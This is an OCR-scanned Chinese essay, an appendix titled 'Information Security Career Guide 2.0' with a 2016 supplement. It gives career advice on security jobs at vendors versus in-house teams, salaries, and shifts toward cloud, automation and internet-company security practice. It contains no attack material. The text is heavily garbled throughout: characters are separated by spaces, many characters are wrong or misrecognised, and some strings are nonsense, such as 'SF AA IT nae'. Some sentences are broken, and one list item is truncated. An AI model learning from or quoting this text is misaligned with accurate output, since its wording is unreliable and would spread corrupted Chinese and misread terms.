画 安 全 蓝图 的 时 候 千 万 别 低 信 了 这 一 部 分 工作 量 ， 搞 了 个 demo 束 去 吹 


附录 ”信息 安全 行业 从 业 指 南 2.0 


我 更 早 以 前 写 过 《信息 安全 从 业 参 考 》《 信 息 安全 的 职业 生涯 》 
《CSO 的 生存 艺术 》 等 文章 ， 这 几 篇 都 归 入 1.0 系 列 ， 这 篇 文章 是 1.0 的 
后 继 和 扩展 。 


我 个 人 没有 能 力 去 预言 安全 产业 的 发 展 ， 但 职业 毕竟 是 个 跟 产 业 
相关 性 比较 大 的 话题 ， 所 以 也 适当 说 一 些 个 人 观点 吧 。 先 从 甲乙 方 说 
起 ， 乙 方 分 为 2B 和 2C 两 类 ， 这 里 主要 说 2B 的 部 分 ， 因 为 2C 中 的 大 部 
分 更 适合 归 入 互联 网 行业 。IDC 的 报告 称 2018 年 中 国企 业 安全 市 场 约 
200 亿 RMB， 相 对 于 互联 网 、 游 戏 等 其 他 领域 而 言 显然 是 个 很 小 的 市 
场 ， 所 以 安全 公司 不 会 像 互联 网 领域 的 创业 公司 一 样 表 地 开花 ， 会 受 
到 整个 市 场 容 量 的 限制 ， 对 于 乙方 ， 如 果 不 是 360， 那 就 是 启明 、 绿 
盟 、 天 融 信 这 类 公司 了 (名 字 太 多 不 一 一 列举 ， 如 果 你 所 在 公司 营业 
额 很 高 而 未 出 现在 此 列 请 不 要 生气 ， 这 里 并 无 意 去 关注 具体 的 公 
司 ) 。 有 人 会 说 以 后 乙方 可 能 还 会 有 BAI 的 安全 团队 ， 没 错 ， 但 从 做 
的 事情 而 言 ， 即 便 阿 里 云 安 全 成 了 乙方 安全 ， 但 实际 上 做 的 事情 对 于 
从 业者 而 言 还 是 甲 方 做 的 那些 事情 ， 因 此 在 这 里 惑 不 把 他 们 归 入 乙方 
了 《2015 年 -2016 年 间 ， 这 些 甲 方 为 了 做 2B 的 业务 也 招募 了 一 些 在 传统 
乙方 做 售 前 和 销售 的 人 员 ) 。 对 于 乙方 做 的 事情 ， 从 厂商 角度 看 可 能 
会 有 一 系列 的 产品 和 服务 的 创新 ， 但 对 于 从 业者 而 言 其 实 跟 以 前 差 不 


太 多 ， 至 少 在 可 见 的 时 期 内 还 看 到 不 到 质 的 变化 。 如 采 你 一 定 要 在 乙 
方 寻求 点 不 同 的 体验 ， 那 就 去 互联 网 安全 公司 的 非 传 统 安全 业务 ,或 
者 去 传统 安全 公司 的 互联 网 业务 线 。 再 看 甲 方 ， 应 该 是 比较 乐观 的 ， 
这 十 一 个 跟 企业 安全 市 场 副 子 无 天 的 领域 ， 随 着 企业 开始 重视 安全 ， 
甲 方 会 有 更 多 的 安全 职位 ， 并 且 安 全 职位 会 多 样 化 ， 这 里 应 该 是 一 个 
比较 广阔 的 空间 。 甲 方 、 乙 方 之 外 是 学 术 研 究 领域 ， 笔 者 对 那 片 土地 
不 是 很 了 解 ， 这 里 仅 限 于 工业 弄 吧 。 欢 迎 学 术 弄 和 高 校 院 墙 之 内 的 同 
学 们 补充 。 《至 于 墨 产 和 国家 队 ， 就 不 打算 写 了 ， 上 毕竟 大 部 分 人 不 会 
走 这 条 路 ， 我 只 知道 那 也 是 一 个 很 神奇 又 有 点 苛 本 的 世界 ， 如 果 你 有 
潜质 ， 仅 这 一 句 话 就 能 把 你 引 向 那里 。) 


如 采 你 尚 在 考虑 要 不 要 进入 这 个 行业 ， 我 可 以 提供 几 点 参考 。 据 
我 和 朋友 们 观察 ，10 多 年 以 来 在 同一 个 公司 同一 个 级 别 上 的 工程 师 ， 
大 多 数 安全 比 运 维和 开发 的 工资 高 ， 但 CTO 大 多 来 目 运 维和 开发 ， 鲜 
有 从 安全 置 升 来 的 。 原 因 不 难 理解 ， 安 全 在 不 少 场合 部 不 是 必需 品 。 
好 或 者 不 好 因 人 而 异 ， 事 实 上 吴 边 还 是 有 很 多 安全 技能 很 高 的 人 表示 
如 条 再 给 一 次 选择 的 机 会 ， 可 能 不 会 选择 安全 ， 这 其 中 包括 你 们 耳 熟 
能 详 的 大 牛 们 。 有 一 个 方法 可 以 目测 一 下 ， 如 有 果 你 内 心 深 处 都 没有 偶 
不想 入侵 一 下 ， 涯 一 下 ， 一 探 安全 究竟 的 时 候 ， 我 建议 你 还 是 考虑 其 
他 行业 ， 你 在 这 个 行业 能 发 力 的 可 能 性 不 大 。 


从 从 业者 的 构成 看 ， 我 认为 可 以 分 为 黑客 圈 、 安 全 圈 和 安全 圈 的 
外 围 。 黑 客 圈 无 论 你 喜欢 叫 他 白 帽 子 还 是 什么 ， 辟 之 束 是 以 攻防 技能 
为 主线 的 人 。 安 全 图 跟 黑 客 圈 交 集 很 大 ， 也 包括 那些 在 安全 行业 的 主 
要 力量 但 却 不 是 白 帽 子 或 黑 帽 子 出 映 的 人 ， 这 两 类 人 构成 了 安全 行业 
的 核心 ， 即 本 质 上 安全 行业 是 由 理解 网 络 攻防 的 人 为 核心 构成 的 。 外 
围 征 什么 呢 ， 随 着 安全 需求 的 多 样 化 ， 安 全 会 引入 大 量 跟 攻 防 不 直 接 
相关 的 人 ， 比 如 做 业务 安全 数据 分 析 ， 运 维 Hadoop 集 群 或 做 BI 的 开 
发 ， 或 者 做 安全 产品 开发 ， 这 些 人 本 质 上 不 是 跟 安 全 行业 强 绑 定 的 ， 
例如 有 的 人 做 安全 产品 的 UI 开 发 ， 换 做 去 其 他 行业 也 一 样 做 UI， 做 业 
务 安全 数据 分 析 的 去 非 安 全 的 业务 部 门 一 样 做 数据 分 机 ， 不 征 疡 格 意 
义 上 安全 行业 的 人 。 只 有 以 攻防 为 主线 ， 和 以 安全 咨询 体系 为 主线 的 
人 才 有 是 跟 安 全 行业 绑 定 的 ， 这 些 人 需要 考虑 终生 投产 比 和 基因 决定 理 
论 对 自身 的 影响 ， 而 外 围 从 理论 上 讲 跨 行业 更 容易 些 。 在 当前 时 间 点 
看 ， 安 全 图 是 一 个 很 小 的 圈子 ， 不 是 远 小 于 ， 古 远 远 小 于 运 维和 开发 
财 ， 江 湖 味道 更 浓 ， 有 了 时候 也 左 具 文人 相 轻 的 味道 。 不 过 好 的 一 面 是 
互联 网 公司 之 间 安 全 团队 的 交流 越 来 越 平 ， 除了 直接 敌对 公司 外 ， 大 
部 分 人 都 朝 厦 更 加 开放 的 沟通 和 分 译文 化 迈进 。 说 了 这 么 多 ， 如 末 你 
想 进 入 安全 行业 ， 并 且 成 为 中 流 碟 柱 ， 那 么 知识 结构 和 背景 拉 能 应 该 
和 攻防 技术 强 相 关 ， 这 条 线 不 你 证 你 容易 成 为 高 管 ， 但 从 统计 学 角度 
能 保证 你 不 仿 离 行业 的 核心 。 


下 面谈 一 下 安全 管理 的 趋势 ， 因 为 这 个 会 影响 从 业者 的 价值 观 和 
学 习 方 同 。 我 个 人 认为 有 如 下 几 个 趋势 : 


1) 企业 安全 管理 最 终 都 会 向 互联 网 公司 学 习 。 未 来 大 多 数 公 司 
都 会 复制 自己 业务 到 互联 网 ， 也 就 是 大 多 数 企业 都 会 拥有 互联 网 的 属 
性 。 从 现在 看 ， 互 联网 公司 的 安全 管理 方法 论 是 领先 传统 公司 整整 一 
个 时 代 的 ， 完 全 不 在 一 个 量 级 上 “。 你 还 在 做 传统 的 安全 吗 ? FIA 
说 你 束 快 不 属于 这 个 行业 了 。 


2) 问 云 迁移 。 云 是 一 种 趋势 ， 虽 然 我 不 认为 短期 内 马上 会 有 非 
常 多 的 公司 将 自己 的 业务 迁移 到 公有 去 上， 或 者 从 头 打造 私有 云 。 但 
是 云 计 算 折 射出 的 IT 管理 方式 、 技 术 织 构 却 会 越 来 越 成 为 安全 管理 的 
风 回 标 ， 例 如 分 布 式 IDC 管 理 、 虚 拟 化 、SDN ` 海量 运 维 生 态 、 业 务 
伸缩 、 大 数据 、 高 度 目 动 化 、 敏 捷 发 布 ..…... 等 很 多 和 沉着 时 代 标 签 的 东 
西 ， 安 全 管理 体系 的 设计 和 产品 化 落地 需要 越 来 越 多 地 围绕 这 些 特性 
标签 展开 工作 ， 如 果 你 没有 这 方面 的 经 验 ， 也 会 逐渐 落后 。 


3) 倾向 于 以 技术 和 产品 (工具 自动 化 ) 解决 问题 ， 而 不 再 是 以 
前 宣扬 的 七 分 管理 三 分 技术 。 看 近 些 年 的 IT 技术 发 展 ， 本 质 上 由 
Google、Facebook 为 代表 的 这 些 互联 网 公司 市 动 ， 除 了 技术 架构 ， 像 
运 维 管理 、 研 发 生命 周期 管理 、 安 全 管理 都 在 成 为 其 他 公司 的 教科 
书 ， 安 全 的 最 高 境界 是 让 你 吴 处 于 保护 之 中 而 不 感觉 那些 楷 琐 措施 和 
流程 的 存在 ， 以 技术 、 目 动 化 、 机 顺 学 习 、 人 工 智能 为 导 同 解决 问题 


的 价值 观 已 超越 流程 制度 的 落后 方式 ， 这 也 是 过 去 那些 理论 标准 越 来 
越 显得 发 虚 的 原因 。 


从 这 些 趋势 看 ， 如 果 你 是 体系 架构 型 、 技 术 复合 型 人 才 (俗称 全 
栈 工 程 师 ) ， 特 定 技术 方 向 专攻 型 人 才 以 后 会 受 市 场 青 睐 ， 而 “务虚 
型 ”人 才 的 市 场 价值 可 能 不 太 乐观 。 随 着 2000 年 后 安 氏 把 基于 资产 威胁 
脆弱 性 风险 评估 方法 论 带 入 中 国 ， 精 通 各 类 安全 标准 的 顾问 号 价 一 度 
比 会 安全 技术 的 工程 师 高 ， 但 现在 这 些 东 西 包括 IT 治理 的 理论 已 经 远 
不 如 以 前 风光 ， 你 说 你 会 TSO27001， 随 便 找 个 聪明 点 的 刚 毕业 的 本 科 
生 ， 做 一 年 也 就 会 了 。 但 如 果 你 说 “我 有 10 万 台 服 务 器 的 安全 管理 经 
验 ”"， 对 方 可 能 会 表示 “小 伙 子 ， 来 我 们 这 上 班 吧 ! ”。 计 会 攻防 的 人 学 
习 ISO27001、20000 之 类 的 东西 ， 这 束 是 可 替代 性 。 很 多 同学 看 到 这 
些 也 许 会 觉得 隧 忽 ， 甚 至 咨询 圈 的 老人 会 列举 一 大 堆 “ 价 值 ? 和 “ 空 
间 ”， 就 像 《 浪 潮 之 匣 》 所 说 的 ， 这 些 都 是 时 代 的 趋势 ， 不 是 以 个 人 意 
志 为 转移 的 ， 哪 介 是 公司 想 拒 绝 它 都 如 同 星 臂 挡车 。 为 什么 在 互联 网 
公司 技术 专家 的 报酬 可 以 比 管理 人 员 高 ， 取 决 于 你 解决 问题 所 对 应 的 
价值 层次 ， 实 际 上 也 是 时 代 演 进 的 产物 ， 也 许 现 在 更 缺 能 解决 实际 问 
题 的 人 。 从 融 业 的 角度 讲 ， 这 种 趋势 为 技术 从 业者 提供 了 更 广阔 的 前 


景 和 空间 。 


对 于 乙方 ， 比 较 有 价值 的 地 方 是 研究 部 门 、 安 全 服务 、 攻 防 强 相 
关 产 品 研发 。 对 于 甲 方 ， 除 了 大 互联 网 《门户 、 搜 索 、 广 告 、 电 商 、 


网 游 、 社 交 、 文 付 、 移 动 APP..…..) 、 人 金融 、 电 信行 业 之 外 ， 其 他 
(就 目前 来 讲 ) 可 能 不 是 甲 方 安全 从 业 的 好 的 选择 ， 毕 竟 形 式 上 重视 
安全 和 本 质 上 重视 安全 还 是 两 回 事 。 现 实生 活 中 的 人 员 分 布 也 可 以 佐 
证 这 一 点 ， 国 内 比较 懂 安 全 的 人 绝 大 部 分 都 在 互联 网 公司 ， 第 一 梯队 
3BAT、 第 二 梯队 BAT 之 外 的 知名 互联 网 公司 (有 些 兄弟 单 拉 出 来 绝 不 
比 BAT 的 差 ， 这 里 主要 是 乱 统 的 比较 ) ， 第 三 梯队 可 能 在 金融 和 电信 
业 有 一 些 ， 再 剩 下 来 可 能 没有 太 慌 安全 的 人 了 ， 因 为 慌 安 全 的 早 就 被 
SF AA IT nae (当然 ， 如 果 看 官 您 恰巧 是 某 个 大 牛 ， 又 恰好 很 
例外 不 在 上 述 行业 中 请 勿 生气 ， 我 会 尽 可 能 在 该 文 的 下 一 修订 版 本 中 
注 明 “xxx 是 个 例外 ， 目 前 在 yyy 就 职 ”% 。 甲 方 安全 建设 的 多 样 性 也 使 
得 分 工 越 来 越 细 网络 与 基础 架构 安全 ， 业 务 与 应 用 安全 ， 风 
a 例如 SRC 运 营 就 是 一 个 相当 垂直 的 细 分 职能 ， 尽 管 在 互联 网 
公司 做 安全 你 可 能 会 有 优越 感 ， 但 如 果 长 时 间 做 很 细 的 一 块 儿 也 可 能 
导致 没有 成 为 领域 专家 却 “ 侦 科 ” 得 很 历 害 。I 字 形 人 才 通 前 比较 受 欢 
迎 ， 最 好 钙 甲 方 乙方 都 乐 过， 那样 所 有 的 套路 你 都 会 了 ， 无 死角 。 


价值 一 方面 跟 人 才 市 场 的 供求 关系 有 关 ， 一 方面 也 跟 学 习 成 本 高 
低 、 获 取 技 能 的 难 易 度 有 关 ， 例 如 你 会 一 种 Web 开 发 语言 ， 
JavaScript，HTTP 协 议 ， 常 用 的 SQL DML 语 句 束 能 开始 玩 Web 安 全 
了 ， 但 如 果 你 想 玩 溢出 ， 相 比 之 下 还 是 需要 花 更 多 的 时 间 学 习 更 多 东 
西 才能 越过 这 个 门槛 ， 而 读 懂 I SO27001 则 容易 的 多 (这 里 无 意 于 表达 
Web 和 二 进 制 谁 更 牛 又 ， 谁 更 值钱 这 样 的 无 聊 问 题 ， 只 是 举 个 抽象 的 


GIF) ， 如 果 你 觉得 因为 钱 多 而 把 自己 的 目标 设 定 为 要 走 袁 哥 的 路 ， 
而 名 视 了 目 己 的 兴趣 ，fail 的 可 能 性 比较 大 。 男 外 ， 技 巧 永 远 不 能 代替 
技术 ， 过 分 迷 候 于 技巧 对 长 足 的 发 展 没 有 好 处 。 


第 一 代 安 全 从 业者 的 技能 基本 以 OS 和 网 络 安全 为 主 ，1.5 到 第 二 代 
以 广义 的 Web Service 等 应 用 安全 为 主 ， 如 果 一 定 要 说 第 三 代 ， 移 动 安 
全 可 能 还 算是 当下 比较 热门 ， 关 注 者 比较 多 ， 相 对 前 沿 。 而 从 VC 的 角 
度 看 ， 移 动 互联 网 可 能 都 不 再 是 热点 ， 早 已 开始 布局 更 下 一 代 的 东西 
了 ， 也 许 是 类 似 于 人 工 智能 这 样 的 领域 。PC 喘 和 Web 安 全 虽然 研究 者 
众多， 议题 众多， 方法 论 很 多 ， 大 多 数 行业 内 的 从 业者 每 天 围绕 这 些 
工作 ， 但 这 些 应 该 即将 归 入 红海 ， 不 再 属于 前 治 的 、 时 代 当 测 之 上 的 
东西 。 反 过 来 说 一 个 监 筹 但 不 再 新 兴 的 市 场 ， 其 对 安全 的 需求 还 是 有 
一 个 很 高 的 保有 量 ， 所 以 有 很 多 事情 可 以 长 期 做 但 也 许 之 后 就 不 在 古 
什么 有 新鲜 感 的 东西 了 。 第 一 代 的 人 起 步 的 时 候 ， 那 时 候 IT 基 础 设置 
和 应 用 复杂 度 都 远 不 如 现在 ， 所 以 那 时 候 都 是 把 安全 建设 放 在 网 络 和 
系统 层面 的 。 而 后 来 随 着 IT 在 社会 生活 中 实用 化 的 程度 越 来 越 高 ， 业 
务 越 来 越 多 的 依赖 于 IT，I 的 多 样 性 和 T 的 复杂 度 成 倍 提 升 ， 使 得 安全 
的 需求 也 越 来 越 广 。 单 个 从 业者 的 技能 不 太 可 能 通 吃 全 部 ， 大 一 点 的 
机 构 开 始 把 业务 安全 独立 出 来 ， 分 工 越 来 越 细 ， 人 研究 的 内 容 则 越 来 
越 专 ， 安 全 团队 中 开始 加 入 开发 和 运 维 ， 甚 至 还 涉及 硬件 领域 ， 也 许 
以 后 的 安全 团队 就 是 一 个 什么 人 都 有 的 兵 右 库 。 对 个 人 来 说 一 方面 你 
到 瓜 需 要 多 前 沿 的 铺 想 才能 不 落后 ， 男 一 方面 则 要 考虑 将 目 映 定位 收 
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个 “" 放 ?" 字 ， 但 落 到 实践 一 定 是 个 “ 收 ? 字 ， 以 如 今 的 技术 复杂 度 你 不 可 
能 样 样 都 精通 ， 只 能 挑 几 个 。 


对 于 从 业者 的 前 景 ， 其 实在 过 去 相当 长 的 时 间 里 ， 由 于 乙方 公司 
的 净利 润 很 低 以 及 甲 方 安全 不 是 产生 收入 的 部 门 ， 从 业者 的 前 景 一 度 
比较 暗淡 。 直 到 后 来 有 了 360 这 样 的 公司 ， 有 了 BAT 的 崛起 ， 才 使 得 反 
术 从 业者 的 每 遇 得 到 了 极 大 的 改善 。 斯 诺 登 事件 曝光 之 后 ， 国 家 层面 
开始 重视 信息 安全 ， 以 华为 这 样 的 企业 建立 安全 能 力 中 心 为 代表 ， 
2014 年 安全 人 才 需 求 开 始 井喷 ， 供 求 比 大 幅 失 衡 ， 国 内 资深 从 业者 的 
工资 已 经 赶 超 了 美国 的 工程 师 ， 在 当下 看 是 一 片 利好 ， 但 有 时 候 也 说 
不 清 这 到 压 古 价值 回归 还 是 有 点 泡沫 成 分 ， 但 短期 内 一 定 是 人 才 供 不 
应 求 ， 长 期 供不应求 也 很 难说 ， 因 为 现在 越 来 越 多 的 高 校 也 开始 培养 
安全 方向 的 人 ， 供 给 量 会 变 大 ， 安 全 会 从 小 众 变 成 大 从 学科。 当然 ， 
无 论 什么 时 候 ， 这 个 行业 的 精英 一 定 有 古 跟 兴趣 和 天 赋 挂 钩 的 ， 有 了 时候 
确实 需要 一 点 “下 | ARIE ATR ° 


关于 创业 ， 如 有 果 你 原先 是 做 安全 产品 研发 ， 能 市 一 文 完整 的 团队 
出 来 ， 做 的 产品 属于 下 一 代 类 型 或 者 干脆 区 是 市 场 空 日 ， 不 妨 符 试 一 
下 ， 其 他 的 类 型 我 认为 创业 的 成 功率 应 该 比较 低 。 


最 后 ， 如 末 你 有 条 件 的 话 ， 多 接触 技术 大 牛 和 资深 从 业者 ， 适 当 
关注 一 下 安全 以 外 的 新 技术 趋势 。 这 时 可 能 会 有 聪明 的 同学 提问 ， 说 


的 这 些 是 不 是 可 以 概括 为 最 优 解 应 该 是 去 互联 网 公司 做 安全 ? 其 实 不 
然 ， 甲 方 乙方 在 不 同 阶段 有 不 同 的 需求 ， 没 有 哪里 一 定 最 好 之 说 ， 哪 
怕 是 BAT 对 有 些 人 来 说 也 是 瓶 贷 之 地 ， 所 以 还 是 看 具体 场景 。 


2016 年 补遗 


从 2014 年 到 2016 年 初 近 两 年 的 情况 看 ， 有 几 个 方面 是 值得 关注 
的 : 


1) 从 传统 的 乙方 专业 安全 公司 到 大 型 互联 网 甲 方 的 视角 转换 问 


2) 纯 安 全 技术 和 业务 的 结合 点 。 


3) 安全 人 研究 如 何 转 化 为 实际 的 价值 。 


乙方 安全 公司 是 甲 方 获取 安全 人 才 的 重要 渠道 ， 主 要 基于 他 们 在 
安全 垂直 领域 的 积 素 ， 但 不 同 之 处 是 甲 方 和 乙方 思路 、 方 法 论 、KPI 
导 同 都 存在 较 大 差异 。 现 在 的 市 场 已 经 不 是 过 去 乙方 明显 强 于 甲 方 的 
时 代 ， 如 果 带 着 原来 乙方 的 交付 思路 和 做 事 风 格 去 直接 落地 ， 钨 得 古 
没 法 软 着 陆 的 。 乙 方 往往 追求 的 是 通用 型 的 解决 方案 ， 广 而 不 深重 
于 安全 而 轻 于 业务 ， 为 了 交付 验收 更 多 地 人 退 求 可 用 性 而 不 古 检 出 率 ， 
为 了 避免 线 上 系统 的 变更 风险 很 多 有 实际 意义 的 功能 不 会 开局 ， 而 甲 


方 追 求 的 是 最 终 “ 能 睡 好 沉 ”， 更 看 重 结果 ， 看 重 对 业务 面 的 影响 。 即 
便 是 去 “忽悠 "， 甲 方 和 乙方 安全 工作 者 忽悠 的 方式 也 是 完全 不 同 的 。 


乙方 眼中 的 安全 体系 虽然 比较 系统 ， 但 更 多 是 基于 咨询 视角 ， 不 
是 由 甲 方 的 实际 业务 场景 抽象 而 来 的 ， 如 果 拿 乙方 的 模型 直接 去 套 甲 
方 现实 中 的 工作 ， 可 能 在 安全 工作 的 “分 类 ”和 “比重 ”两 个 层面 都 无 法 
一 一 对 应 。 


乙方 解决 方案 更 多 的 体现 为 理论 上 可 行 ， 而 不 是 实 操 上 可 行 。 在 
互联 网 行业 ， 理 论 上 可 行 的 方案 如 何 转化 为 有 性 价 比 的 、 可 实现 的 安 
全 方案 需要 在 各 种 维度 进行 考量 ， 而 不 是 在 网 天 上 放 一 个 硬件 盒子 或 
改 一 行 代 码 那 么 稍 单 。 乙 方 腿 中 的 正确 解 不 一 定 是 甲 方 上 腿 中 的 合理 
解 ， 是 否 正 确 合理 并 不 是 简单 的 由 “ 征 否 能 修补 漏洞 本 号 ”这 个 命 古 决 
定 的 ， 而 需要 综合 考虑 以 下 问题 : 对 现 有 系统 的 改动 成 本 ， 对 织 构 的 
变更 影响 ， 与 现 有 安全 系统 的 结合 程度 ， 以 后 对 同类 问题 解决 的 扩展 


性 等 。 


传统 的 建设 思路 和 互联 网 行业 也 风格 迎 异 。 单 点 型 安全 措施 如 何 
转化 为 系统 化 、 平 台 化 的 、 治 本 型 的 防御 手段 需要 建立 在 了 解 具体 的 
业务 类 型 之 上 ， 中 高 端 职 位 的 招聘 要 求 上 往往 都 有 一 条 叫做 “沟通 能 
力 -推动 安全 策略 落地 *"， 那 到 底 什 么 样 的 人 才 有 真正 的 推动 能 力 ? EQ 
高 效用 人 际 关 系 算 ? 笔者 认为 这 只 是 野 路 子 的 一 个 分 文 妥 了 ， 并 不 是 
真正 意义 上 能 力 ， 能 上 得 了 厅 符 的 推动 能 力 是 你 很 熟悉 互联 网 公司 的 


运 维 和 开发 ， 熟 悉 所 有 场景 的 风险 缓解 措施 对 业务 面 的 影响 ， 并 且 知 
道 当 安全 给 运 维 和 开发 市 来 阻碍 时 ， 运 维和 开发 在 新 的 安全 机 制 下 对 
应 的 目 我 改善 措施 是 什么 ， 在 推动 安全 策略 时 殉 能 无 往 而 不 利 。 比 如 
当 安 全 拦截 设备 降低 系统 的 并 发 能 力 的 时 候 ， 你 了 解 哪 些 是 比 影 响 到 
用 户 的 每 个 请 求 应 答 时 长 难以 改善 的 ， 哪 些 是 存 吐 量 可 以 通过 堆 机 制 
改善 并 发 用 户 总 容量 的 ， 如 果 你 只 有 一 个 解 ， 往 往 相当 于 给 运 维和 开 
发 出 了 没有 选择 的 难题 ， 而 你 又 不 能 提供 对 应 的 解决 方案 ， 那 结果 目 
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同样 ， 甲 方 的 同学 也 应 根据 乙方 同学 的 特点 为 他 们 寻找 更 好 的 环境 适 
以 渠道 。 


在 安全 大 会 和 媒体 上 曝光 量 最 多 的 是 安全 漏洞 和 单 点 型 安全 新 技 
术 ， 从 互联 网 营销 的 角度 ， 没 有 任何 专业 知识 的 普通 网 民 可 以 把 网 络 
安全 等 价 于 “黑客 ”漏洞 ”等 惹眼 球 的 名 词 ， 但 对 安全 从 业者 来 说 却 不 
是 。 站 在 镁 光 灯 下 炫 技 的 技术 跟 现实 环境 中 的 安全 设计 之 间 是 存在 较 
大 鸿沟 的 。 尽 管 从 历史 上 来 看 是 攻击 技术 促进 了 防御 技术 的 发 展 ， 但 
一 个 很 现实 的 问题 是 实际 上 大 多 数 人 都 是 安全 工作 者 ， 而 非 职业 入 侵 
者 ， 所 以 研究 的 成 果 如 何 转化 是 很 有 挑战 的 问题 ， 例 如 Google 的 3 篇 
map-reduce、bigtable、GFS 论 文 带动 了 整个 行业 的 技术 发 展 ， 安 全 方 
面 也 开源 了 Native Client 沙 箱 (Google 的 一 个 sandbox 项 目 ) 这 样 的 项 


目 ， 国 内 的 安全 人 研究 者 是 否 也 能 往 这 个 方向 稍微 转 一 转 : 提出 问题 ， 
同时 提供 一 个 更 好 的 解决 方案 。 从 利益 的 角度 看 ， 一 个 好 的 解决 方案 
往往 是 一 个 商机 。 


在 大 型 企业 ， 安 全 研究 应 该 如 何 贴近 业务 产生 价值 是 一 个 系统 性 
方法 论 ， 笔 者 会 在 技术 博客 中 专门 讨论 这 一 话题 。 


2016 年 是 安全 从 业 环 境 继续 火热 的 一 年 ， 公 司 高 层 对 招募 高 端 安 
全 人 才 的 价值 ， 安 全 圈 内 的 大 佬 们 对 安全 工作 价值 的 定位 和 认 知 ， 广 
大 从 业者 对 目 己 的 定位 和 发 展 方 问 都 会 在 意识 形态 上 产生 新 一 轮 大 清 
洗 。 在 企业 内 部 如 何 消 化 并 用 好 已 经 招募 的 安全 人 才 也 是 对 管理 者 很 
有 挑战 的 问题 。 


